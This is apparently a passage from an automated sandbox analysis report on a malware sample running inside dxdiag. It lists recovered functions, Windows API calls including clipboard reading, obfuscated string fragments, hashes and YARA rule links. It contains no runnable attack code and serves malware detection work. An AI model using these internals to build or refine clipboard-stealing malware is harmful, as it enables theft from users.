Opcode Fuzzy Hash: ddc78d1b04d6bec4008d7390ca24b1b937114dd695eca5aeaa2e66312c2f3a60
Instruction Fuzzy Hash: EF3179726805018BDB1CDB28DC91A7E7362EB5E324F2A572ED492B77E1C7389C12C749

Function 0040D866 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 343dc57fd85ca318e9cab81e4ba610ce05acd3c36ba71d43b9120f80a9a00c8a
Instruction ID: 01ca3aed7babf808add9e7fd7257d4aa18570a6a75482a61117814391ff3c097
Opcode Fuzzy Hash: 343dc57fd85ca318e9cab81e4ba610ce05acd3c36ba71d43b9120f80a9a00c8a
Instruction Fuzzy Hash: AA31BF76B10A008BD728CF29C851B26B7E3BFC6304F19D12DD09AC77A5EB78A8018B54

Function 0040CC16 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040CC1A
CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CD67

Strings

(02N, xrefs: 0040CD73

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: Initialize
String ID: (02N
API String ID: 2538663250-482182587
Opcode ID: 5dda1f8ef3903148d2f90ff3463849efe98f65f23156c3258cfb4110ce7950d6
Instruction ID: d17696292bc297aee8fb915d5703223a9b482fd72e7288d2817973478bab555f
Opcode Fuzzy Hash: 5dda1f8ef3903148d2f90ff3463849efe98f65f23156c3258cfb4110ce7950d6
Instruction Fuzzy Hash: 3E41B6B4D10B40AFD370EF39DA0B7127EB4AB05250F504B2DF9EA866D4E631A4198BD7

Function 0040CDA5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CDB7

Strings

Nf, xrefs: 0040CDC7

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeSecurity
String ID: Nf
API String ID: 640775948-501009845
Opcode ID: cc0bac53719f05fd76b6ebac675668444252fa88d21156f1485ccdb508311816
Instruction ID: d4c561bf1a5b18bbc5a108682527e0612a5fd10810c78835407b1c78b182e784
Opcode Fuzzy Hash: cc0bac53719f05fd76b6ebac675668444252fa88d21156f1485ccdb508311816
Instruction Fuzzy Hash: 8AD092347D4240BAE2249708AC17F1022119302F55F300226B363EE2E0D9907141860D

Function 00433195 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 004331B5

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 2f573e232fa3002a4601395236eb5b6ae86ddd1d5b3cef5a9b094565ea09aab7
Instruction ID: 3dcccac6d406af36a65d69c1e0d77e321988698b0dd3df6f47d0d67d5a4e7b69
Opcode Fuzzy Hash: 2f573e232fa3002a4601395236eb5b6ae86ddd1d5b3cef5a9b094565ea09aab7
Instruction Fuzzy Hash: 5A119435A055848FCB19CF38CC54B5ABFF16F4B201F09C1EED95997392CA349909CB11

Function 00439DE0 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,00000000,-00001000,0043634D,00000000,-00001000,00000040,?,00000000), ref: 00439E12

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: eb7d745538af2e112f280afb521d2e7db1d87c50453d574173b658df3250f6e1
Instruction ID: f371fc5d33ece009c4c3a0571b7c3e2245088c9ce721a5e6db8221790f4f6db8
Opcode Fuzzy Hash: eb7d745538af2e112f280afb521d2e7db1d87c50453d574173b658df3250f6e1
Instruction Fuzzy Hash: 99E02B76514710EBC6005F64BC07B1B3B64EF8A712F01083AF44496152DB38E801C5EF

Function 0042F18E Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042F1D6

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: f066d8136630dc46cb24742ad5accdc9ac96aa1f0028cb8de37fa5b4ae37cf04
Instruction ID: 92cf7cd52a0b26c4ab4cf5037d2a8ef19b8d3357c895488f279ef1d82b73d9c3
Opcode Fuzzy Hash: f066d8136630dc46cb24742ad5accdc9ac96aa1f0028cb8de37fa5b4ae37cf04
Instruction Fuzzy Hash: 3AF0B7B45087018FE314DF29D5A8716BBF0FB84304F10891CE4968B391CBB5A648CF86

Function 0042CEE6 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042CF2E

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 2b6c7347b63c56c7ba1f0f97762e9121d9dc5645105ebc7166e137d76f548b4c
Instruction ID: 0899820397365732e2da90ce65a4afed0ef7eceabc5b433f77fa9bfe01264dcb
Opcode Fuzzy Hash: 2b6c7347b63c56c7ba1f0f97762e9121d9dc5645105ebc7166e137d76f548b4c
Instruction Fuzzy Hash: BFF0DA745093018FD314DF29D0A871BBBE0FB88714F00891CE4958B390DB75A648CF82

Function 00438612 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 0043862D

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 27747b72a67b977cf105f9c95d7ced292bc03dc07a125d0771843c6e3fd466d0
Instruction ID: 4b498aae19b3e6e4938b8adf9d962b10c79c0f4802967231e3dbdd59588952b8
Opcode Fuzzy Hash: 27747b72a67b977cf105f9c95d7ced292bc03dc07a125d0771843c6e3fd466d0
Instruction Fuzzy Hash: 7DC08C31404A26EBCA102F18BC07BCA3A20DF0A321F0308A1F900980B6C739DC92C9DC

Function 004385E0 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,00000000,00414C1F,00000400), ref: 004385F0

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bca7d58748ae5aecf304c81bf07840e3b5a28b072888644e0b079d4f2959ecbd
Instruction ID: 1ff8db07d7a6c5951f5da3d7f0bd717f597c0928698ba3c33e75086f2b70e91b
Opcode Fuzzy Hash: bca7d58748ae5aecf304c81bf07840e3b5a28b072888644e0b079d4f2959ecbd
Instruction Fuzzy Hash: 3CC04C35445220AAC6106B15EC05B867B54DF49351F014055B104660728760AC418AD9

Non-executed Functions

Function 00412200 Relevance: 129.6, Strings: 102, Instructions: 2133COMMON

Download Yara Rule

Strings

", xrefs: 004139E4
+, xrefs: 00413984
/, xrefs: 00413E07
&, xrefs: 0041291D
g, xrefs: 00412ED4
W, xrefs: 00413667
;, xrefs: 00412E05
O, xrefs: 00413647
&, xrefs: 004128FD
$, xrefs: 00413974
, xrefs: 00413DFF
o, xrefs: 00413A8C
}, xrefs: 0041290D
I, xrefs: 0041395C
$, xrefs: 00412D0F
g, xrefs: 00413DDF
A, xrefs: 00413373
?, xrefs: 00412CFF
<, xrefs: 00413994
9, xrefs: 004139F4
g, xrefs: 00413195
d, xrefs: 00413747
K, xrefs: 004128BD
C, xrefs: 0041392C
A, xrefs: 00413627
p, xrefs: 00413A94
Z, xrefs: 00412DCD
Q, xrefs: 0041399C
@, xrefs: 00413363
(, xrefs: 0041247C
-, xrefs: 00413924
], xrefs: 004139FC
9, xrefs: 00413964
t, xrefs: 004139B4
W, xrefs: 004139CC
), xrefs: 00413DCF
@, xrefs: 00413A14
a, xrefs: 00413717
<, xrefs: 00412E0D
7, xrefs: 00412DE5
k, xrefs: 00413A6C
c, xrefs: 00413A2C
=, xrefs: 004139D4
c, xrefs: 00412EB4
D, xrefs: 00413B8D
{, xrefs: 004139C4
G, xrefs: 0041394C
m, xrefs: 00413A7C
i, xrefs: 00413A5C
E, xrefs: 0041393C
K, xrefs: 0041396C
e, xrefs: 00412EC4
0, xrefs: 00413914
D, xrefs: 004140F8
", xrefs: 00413DEF
v, xrefs: 00413707
B, xrefs: 004135F7
3, xrefs: 00413934
g, xrefs: 00413A4C
=, xrefs: 00412E15
|, xrefs: 0041319A
p, xrefs: 00412375
!, xrefs: 00413DF7
O, xrefs: 0041398C
Q, xrefs: 00413677
q, xrefs: 00413A9C
M, xrefs: 0041397C
Y, xrefs: 004139DC
M, xrefs: 004136B7
e, xrefs: 00413A3C
Y, xrefs: 004128ED
a, xrefs: 00412EA4
U, xrefs: 004139BC
;, xrefs: 0041251D
:, xrefs: 00413954
$, xrefs: 004128CD
R, xrefs: 0041275D
K, xrefs: 004135E7
`, xrefs: 00412F89
F, xrefs: 00413637
=, xrefs: 00413A04
4, xrefs: 0041276C
9, xrefs: 00412DF5
s, xrefs: 00412767
o, xrefs: 00413571
#, xrefs: 00413944
r, xrefs: 00412762
[, xrefs: 004139EC
S, xrefs: 004139AC
5, xrefs: 00412DD5
_, xrefs: 00413A0C
H, xrefs: 00412624
>, xrefs: 004139A4
a, xrefs: 00413A1C
W, xrefs: 004128DD
}, xrefs: 004122C2
A, xrefs: 0041391C
N, xrefs: 00413A84
f, xrefs: 00413737
H, xrefs: 00413607
;, xrefs: 00412D1F
f, xrefs: 00412ECC

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: $!$"$"$#$$$$$$$&$&$($)$+$-$/$0$3$4$5$7$9$9$9$:$;$;$;$<$<$=$=$=$>$?$@$@$A$A$A$B$C$D$D$E$F$G$H$H$I$K$K$K$M$M$N$O$O$Q$Q$R$S$U$W$W$W$Y$Y$Z$[$]$_$`$a$a$a$c$c$d$e$e$f$f$g$g$g$g$i$k$m$o$o$p$p$q$r$s$t$v${$|$}$}
API String ID: 0-2298439183
Opcode ID: 2fca1a34db66d2f979c72fa397fdd48071d883c2b4100c1f0ee5dc9a809098c4
Instruction ID: 083fd10bc4ed8af0561365f8755418076205ed3f8dd68f74a68bf74da31982d7
Opcode Fuzzy Hash: 2fca1a34db66d2f979c72fa397fdd48071d883c2b4100c1f0ee5dc9a809098c4
Instruction Fuzzy Hash: 8E13B23160C7C18AD335CB38845539FBBE2ABD6324F188A6EE4E9873D2D6788542C757

Function 004238F0 Relevance: 21.8, Strings: 17, Instructions: 517COMMON

Download Yara Rule

Strings

GP, xrefs: 00423CD0
GI, xrefs: 00423BBD
OM, xrefs: 00424123
CH, xrefs: 00424144
JY, xrefs: 00423E7E
8X, xrefs: 00424139
uv, xrefs: 00424025
29B, xrefs: 00423860, 0042391F
{w, xrefs: 00423CBA
46, xrefs: 0042444A
rM, xrefs: 00423CC5
O:, xrefs: 0042412E
R\, xrefs: 00423E86
rs, xrefs: 00423DEE
02, xrefs: 0042443F
^E, xrefs: 00423E8E
|~, xrefs: 00424384

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: 29B$8X$CH$GP$JY$O:$OM$R\$^E$rs$rM$uv${w$02$46$GI$|~
API String ID: 0-2187006609
Opcode ID: ecc0fc787c0b6cd285c1698c568045089e0644926ad2ac97ce3fe72f36c1f917
Instruction ID: 571314284cfc883063d67328f2f268305e4fa17690c0835aa9d0b0b07ad656d6
Opcode Fuzzy Hash: ecc0fc787c0b6cd285c1698c568045089e0644926ad2ac97ce3fe72f36c1f917
Instruction Fuzzy Hash: 37421DB564C3818AD330CF54D842B9FBAF2EBD2300F00892DD5E96B256C775864ADB97

Function 00434ED0 Relevance: 21.6, Strings: 17, Instructions: 319COMMON

Download Yara Rule

Strings

&, xrefs: 00435177
[, xrefs: 00434EDE
[, xrefs: 00434FB0
\, xrefs: 00434EE3
q, xrefs: 0043508A
-, xrefs: 004351E2
\, xrefs: 0043517C
], xrefs: 00434FBA
\, xrefs: 00434FB5
), xrefs: 00435237
H, xrefs: 00435120
y, xrefs: 00435116
#, xrefs: 00435232
|, xrefs: 0043511B
<, xrefs: 0043516D
], xrefs: 00434EE8
~, xrefs: 00435125

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: #$&$)$-$<$H$[$[$\$\$\$]$]$q$y$|$~
API String ID: 0-875500967
Opcode ID: 3bcbecbddcf8bc29a05a5b43c94189d71db8383b50a5ea400568bbe92f363e52
Instruction ID: 5554db80201a8ba6ea3474702efe9192065d530e6ae71f569cd6bb248edef4d2
Opcode Fuzzy Hash: 3bcbecbddcf8bc29a05a5b43c94189d71db8383b50a5ea400568bbe92f363e52
Instruction Fuzzy Hash: 4FB10A23A1D7904AE314897C884535B9EC31BE6224F2ECB6DD8E5973C2D57DC9068393

Function 004303F0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 124clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00430404
GetWindowLongW.USER32 ref: 00430429
GetClipboardData.USER32 ref: 00430439
GlobalLock.KERNEL32 ref: 00430452
GlobalUnlock.KERNEL32 ref: 00430578
CloseClipboard.USER32 ref: 00430583

Strings

m, xrefs: 004304D8
r, xrefs: 004304DD
$, xrefs: 004304C4
!, xrefs: 004304BA
o, xrefs: 004304E2
#, xrefs: 004304CE

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: !$#$$$m$o$r
API String ID: 2832541153-1228291082
Opcode ID: 9aabbc75b445cbdc09f20715aaa2dda78bd6a68a7388c67d93f533054e1a149d
Instruction ID: 5f04a8027e3d7a55f1d66e97924e677b1801266d210010e4a128a03f4dc74b7a
Opcode Fuzzy Hash: 9aabbc75b445cbdc09f20715aaa2dda78bd6a68a7388c67d93f533054e1a149d
Instruction Fuzzy Hash: CC41907160C3818FD300EF78959935EBFE0AB95308F08593EE4C987292D6BD85499B5B

Function 0041676A Relevance: 20.4, Strings: 16, Instructions: 364COMMON

Download Yara Rule

Strings

G6DH, xrefs: 004168AB
P&U8, xrefs: 0041687F
K:^<, xrefs: 0041688A
UV, xrefs: 00416903
3N#@, xrefs: 004168C1
C>K0, xrefs: 00416895
RT, xrefs: 004169C1
0J4L, xrefs: 004168B6
M"`$, xrefs: 00416874
g2V4, xrefs: 004168A0
*Z/\, xrefs: 004168E2
Z.\ , xrefs: 00416869
-R?T, xrefs: 004168F8
<^#P, xrefs: 004168ED
<F9X, xrefs: 004168D7
M*T,, xrefs: 0041685E

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: *Z/\$-R?T$0J4L$3N#@$<F9X$<^#P$C>K0$G6DH$K:^<$M"`$$M*T,$P&U8$UV$Z.\ $g2V4$RT
API String ID: 0-3486322482
Opcode ID: ce30911c56949484c871613a9b58aee768a7c3ed8897db213ed400ca2e5a3e73
Instruction ID: bfdc5e733220a4266b0cee0809eb26845f7d15cd3bd46db4d77d1dfb423e5921
Opcode Fuzzy Hash: ce30911c56949484c871613a9b58aee768a7c3ed8897db213ed400ca2e5a3e73
Instruction Fuzzy Hash: 14B199B45093918BD7348F29C4907EBBBE0AF96304F558A2DD8C95B390DB798885CB87

Function 0040B124 Relevance: 19.1, Strings: 15, Instructions: 302COMMON

Download Yara Rule

Strings

5Q0S, xrefs: 0040B1E8
WePg, xrefs: 0040B20B
W;, xrefs: 0040B4C3
WaLc, xrefs: 0040B204
iAbC, xrefs: 0040B1CC
HiBk, xrefs: 0040B212
=?, xrefs: 0040B1C5
{-G/, xrefs: 0040B1A9
O;, xrefs: 0040B490
,Yu[, xrefs: 0040B1F6
i]m_, xrefs: 0040B1FD
$q?s, xrefs: 0040B220
8I&K, xrefs: 0040B1DA
'm&o, xrefs: 0040B219
8uZw, xrefs: 0040B22A

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: =?$$q?s$'m&o$,Yu[$5Q0S$8I&K$8uZw$HiBk$O;$W;$WaLc$WePg$iAbC$i]m_${-G/
API String ID: 0-2287720743
Opcode ID: a8e193ca5121b7fe708194ddb65a1b39536846b7ffe5ce25fb94a828c6cf7a23
Instruction ID: 29238d0ecd9fd652967a2f07aa34a714a27bdb8438f077e70085c6c9b953e65e
Opcode Fuzzy Hash: a8e193ca5121b7fe708194ddb65a1b39536846b7ffe5ce25fb94a828c6cf7a23
Instruction Fuzzy Hash: BAC1ABB4200301CFDB288F25D8917567BA1FB45310F2586BDDC5A9F29ADB34D842CF94

Function 0041DA80 Relevance: 15.9, Strings: 12, Instructions: 904COMMON

Download Yara Rule

Strings

ubk$, xrefs: 0041DE5F
e, xrefs: 0041E1B5
ASSU, xrefs: 0041E1AD
[]SN, xrefs: 0041DE0F
bs$, xrefs: 0041E493
UaUQ, xrefs: 0041DDF7
_s$, xrefs: 0041E45D
}nn~, xrefs: 0041DE6A
R_QQ, xrefs: 0041E1A5
AHAq, xrefs: 0041DE17
1>?<, xrefs: 0041E1F6
R][j, xrefs: 0041DC9D

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: 1>?<$AHAq$ASSU$R][j$R_QQ$UaUQ$[]SN$_s$$bs$$e$ubk$$}nn~
API String ID: 0-3156591309
Opcode ID: 84e542dcf362c4722633b38991b48ed42a758c2a9ed69d5e91c7dd3c190ae891
Instruction ID: cb5f53731036b88b860b65b87d3060a00e5eb7a07e2cb5fd5f7d8ae11adf455f
Opcode Fuzzy Hash: 84e542dcf362c4722633b38991b48ed42a758c2a9ed69d5e91c7dd3c190ae891
Instruction Fuzzy Hash: 8852577590C3518FC725CF25C8407ABBBE1AF86304F084A6DE8E59B382D739D906CB96

Function 00425800 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 444COMMON

Download Yara Rule

Strings

r`B, xrefs: 00426065
BdB, xrefs: 00426434
7#v, xrefs: 0042624B
~bB, xrefs: 00426278, 004264EC, 00426800
jdB, xrefs: 00426464
<=, xrefs: 0042620F

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: <=$BdB$jdB$r`B$~bB$7#v
API String ID: 0-226281226
Opcode ID: 7283b4ef89dd7f4654847078150be036275240888603589d3de15dc1c6c1ce9b
Instruction ID: 340aef6d2692e72857662edcd36e925b24db6bbbcaf4b5bc792621142b15778b
Opcode Fuzzy Hash: 7283b4ef89dd7f4654847078150be036275240888603589d3de15dc1c6c1ce9b
Instruction Fuzzy Hash: 82E123B560C3808BD734DF24D85276BBBE1FB82314F05892DE0D69B352EB798501CB8A

Function 00419710 Relevance: 11.7, APIs: 2, Strings: 4, Instructions: 1213COMMON

Download Yara Rule

APIs

Part of subcall function 00439E40: LdrInitializeThunk.NTDLL(0043C1EB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00439E6E

FreeLibrary.KERNEL32(?), ref: 00419CA6
FreeLibrary.KERNEL32(?), ref: 00419D0B

Strings

ST, xrefs: 00419A7D
J,I., xrefs: 00419A90
I,~M, xrefs: 0041A423
#v, xrefs: 00419CA6, 00419D0B

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: I,~M$J,I.$ST$#v
API String ID: 764372645-3166301710
Opcode ID: d890d32fbb13f0df0ad3a9381c1ff360bd9b398ea0201f9c1d6794e8eacfa1d7
Instruction ID: 3a946de6d06df9888b19065ab5da8f4f8076a039cb09845347bca5e298d55306
Opcode Fuzzy Hash: d890d32fbb13f0df0ad3a9381c1ff360bd9b398ea0201f9c1d6794e8eacfa1d7
Instruction Fuzzy Hash: ED8229746083409BE714DF24D890BAFBBE2EBD6314F28892DE58547392D779DC81CB4A

Function 00417742 Relevance: 10.5, Strings: 8, Instructions: 526COMMON

Download Yara Rule

Strings

N, xrefs: 00417AE4, 00417B28
), xrefs: 00417B89
H, xrefs: 00417ADD
C, xrefs: 00417905
A}A, xrefs: 00417D3B
ts, xrefs: 004178FD
cp, xrefs: 004178F5
h{A, xrefs: 00417B47, 00417B61

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: )$A}A$C$H$N$cp$h{A$ts
API String ID: 0-2460436281
Opcode ID: e72cfd5e58267174583cb2aefa18fb3aa2280ca7967e1c0677e4e59f799665dc
Instruction ID: c091a61c3610e84d45043be11fa95010c19d3da449df3a573e39c3d9f215f14f
Opcode Fuzzy Hash: e72cfd5e58267174583cb2aefa18fb3aa2280ca7967e1c0677e4e59f799665dc
Instruction Fuzzy Hash: EFF14375A083518BD714DF28C8906ABB7F2FFD5314F188A2DE4C98B391EB389941C796

Function 004092D0 Relevance: 10.4, Strings: 8, Instructions: 436COMMON

Download Yara Rule

Strings

^=, xrefs: 0040940E
, xrefs: 004096EE
QS`, xrefs: 00409655
f}oe, xrefs: 004093A6
ca}`, xrefs: 004093B6
v, xrefs: 00409321
LS`, xrefs: 0040969B
zE, xrefs: 00409463

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: LS`$QS`$^=$ca}`$f}oe$v$zE$
API String ID: 0-1738842590
Opcode ID: 3b1b216516dbc741a7d0b8159a95c0c4f5c0bb8da2b18092da4a11f8244ac20c
Instruction ID: 8397652dd6c80c3d6384abaef94ac051be11649c1be440025a567e8f984c36e4
Opcode Fuzzy Hash: 3b1b216516dbc741a7d0b8159a95c0c4f5c0bb8da2b18092da4a11f8244ac20c
Instruction Fuzzy Hash: C0C1E77260C3918BC326CF69849076BFFE1AF96310F094A6DE4D55B382D3798D0AC796

Function 00427365 Relevance: 10.3, Strings: 8, Instructions: 338COMMON

Download Yara Rule

Strings

(MO, xrefs: 00427446
*O, xrefs: 004274D8
1Q<S, xrefs: 0042744E
!YZ[, xrefs: 0042745E
vw, xrefs: 004274EC
5U$W, xrefs: 00427456
'I8K, xrefs: 0042743E
7E%G, xrefs: 00427436

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: !YZ[$'I8K$(MO$*O$1Q<S$5U$W$7E%G$vw
API String ID: 0-110145457
Opcode ID: 9732b06a73e385f885b5dbe102d8aac1c51981338c974522d8cbeaa61a1d13e9
Instruction ID: 1450f61bfb5304e21163cb8565421a3d7c92680fc4378e386598e8c3f998bcbb
Opcode Fuzzy Hash: 9732b06a73e385f885b5dbe102d8aac1c51981338c974522d8cbeaa61a1d13e9
Instruction Fuzzy Hash: B2B1C1B6A1C3618BC724CF19A84166BB7F1EFC1304F14882DE9899B341E778D50ACB86

Function 0042456F Relevance: 9.1, Strings: 7, Instructions: 366COMMON

Download Yara Rule

Strings

?c:7, xrefs: 004249B7
]VWC, xrefs: 0042497B
qAB_, xrefs: 0042478F, 0042479F
QVTH, xrefs: 00424983
. &., xrefs: 004249AC
$Q, xrefs: 004249C2
,.-(, xrefs: 00424996

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: $Q$,.-($. &.$?c:7$QVTH$]VWC$qAB_
API String ID: 0-2163668455
Opcode ID: ca1b7030970def91fcc269924cbecb74bf813ef76d999bb66b241e4d17540760
Instruction ID: d19ded286c5482f05c95a3e280dd030e35027ba8af5a7be08d79747085adfcff
Opcode Fuzzy Hash: ca1b7030970def91fcc269924cbecb74bf813ef76d999bb66b241e4d17540760
Instruction Fuzzy Hash: 99B179717083A18BD724CB34A4412EBB7D1DFD6300F948A2FD9998B382E338D905D79A

Function 004281C0 Relevance: 8.2, Strings: 6, Instructions: 665COMMON

Download Yara Rule

Strings

1F&X, xrefs: 004281F9
%R6T, xrefs: 0042820E
jPl, xrefs: 0042821C
=N?@, xrefs: 004281EB
|Z7\, xrefs: 00428200
%V6h, xrefs: 00428215

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: jPl$%R6T$%V6h$1F&X$=N?@$|Z7\
API String ID: 0-720933595
Opcode ID: 774de880706ee3f8471cdb5d7e1680f0c02cd5f6432aacaaaaf0103cd51c3b9f
Instruction ID: f39d86c070ab500bf256f0a98519923189adf886995b2a16e0c98b1acc46fafb
Opcode Fuzzy Hash: 774de880706ee3f8471cdb5d7e1680f0c02cd5f6432aacaaaaf0103cd51c3b9f
Instruction Fuzzy Hash: F4227A75A04255CFDB04CF68E8817AEBBB2FF4A310F68416DE441AB392DB399D01CB58

Function 0041AFD8 Relevance: 7.7, Strings: 6, Instructions: 153COMMON

Download Yara Rule

Strings

2l, xrefs: 0041B124
a+ab, xrefs: 0041B10C
gdk|, xrefs: 0041B11C
|ed, xrefs: 0041B114
G, xrefs: 0041B012
oscd, xrefs: 0041B104

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: 2l$G$a+ab$gdk|$oscd$|ed
API String ID: 0-3137366845
Opcode ID: 411c911b66ffff2e9b30ef3c3b7db8ad7d55e8e77a8e129a3cd9494ef06f664d
Instruction ID: 2b51620a84509c9e7f89b2250eaa4d1d77fcbe22bbd39bf4a7e45a94f0a53178
